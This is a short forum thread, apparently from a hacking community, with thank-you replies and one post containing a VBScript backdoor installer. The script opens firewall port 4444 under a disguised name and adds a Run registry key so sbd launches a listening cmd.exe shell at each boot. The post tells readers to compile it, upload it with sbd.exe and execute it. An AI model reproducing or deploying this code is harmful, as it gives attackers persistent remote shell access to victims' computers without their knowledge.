Thank you so much for the post. Well, few minor issues, these conmmands does not work on vista>
Thank you everyone in this thread for all the knowledge you have posted. My script kiddie brain is soaking it all up in hopes to evolve one day.
One of the best threads on this forum!
Keep up the good work Kazalku!
Thanks a lot...:)
It's good to know that actually somebody is using the information....
Hey I was thinking instead of turning of the Xp firewall.
Just open a port in it and let the backdoor use the same port.
---> VbScript to open a port in the firewall then compile to EXE and upload
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
Set objPort = CreateObject("HNetCfg.FwOpenPort")
objPort.Port = 4444
objPort.Name = "WindowsETA"
objPort.Enabled = TRUE
Set colPorts = objPolicy.GloballyOpenPorts
errReturn = colPorts.Add(objPort)
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Rundll32*", "C:\WINDOWS\sbd -l -r0 -p 4444 -D on -e cmd.exe"
Then compile to exe and upload like (install.exe) After upload also upload Sbd.exe and execute install.exe
Would be nice in a Meterpreter script:)